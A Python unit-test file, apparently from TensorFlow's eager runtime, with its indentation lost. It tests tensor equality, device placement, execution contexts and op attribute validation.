from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
@test_util.with_eager_op_as_function
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.abc.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.abc.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
# TODO(b/207402791): re-enable once incompatible shapes supported by XLA.
if not test_util.is_xla_enabled():
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
self.skipTest('flaky; b/194307407')
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
@test_util.disable_eager_op_as_function('b/206994108')
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
@test_util.with_eager_op_as_function
class SendRecvTest(test_util.TensorFlowTestCase):
